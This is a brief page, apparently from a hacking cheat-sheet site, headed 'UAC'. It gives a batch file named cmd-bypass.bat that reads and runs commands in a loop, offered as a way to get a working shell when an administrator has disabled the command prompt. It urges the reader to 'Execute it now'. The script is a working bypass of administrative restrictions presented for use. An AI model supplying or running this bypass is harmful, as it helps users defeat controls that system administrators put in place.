UAC
"The command prompt has been disabled by your administrator"

Create a file : cmd-bypass.bat :
@echo off
cls
echo Hacker's CMD && echo.
:A
set /P x="%cd%: "
%x%
goto A
Execute it now ! π₯
Last updated
Was this helpful?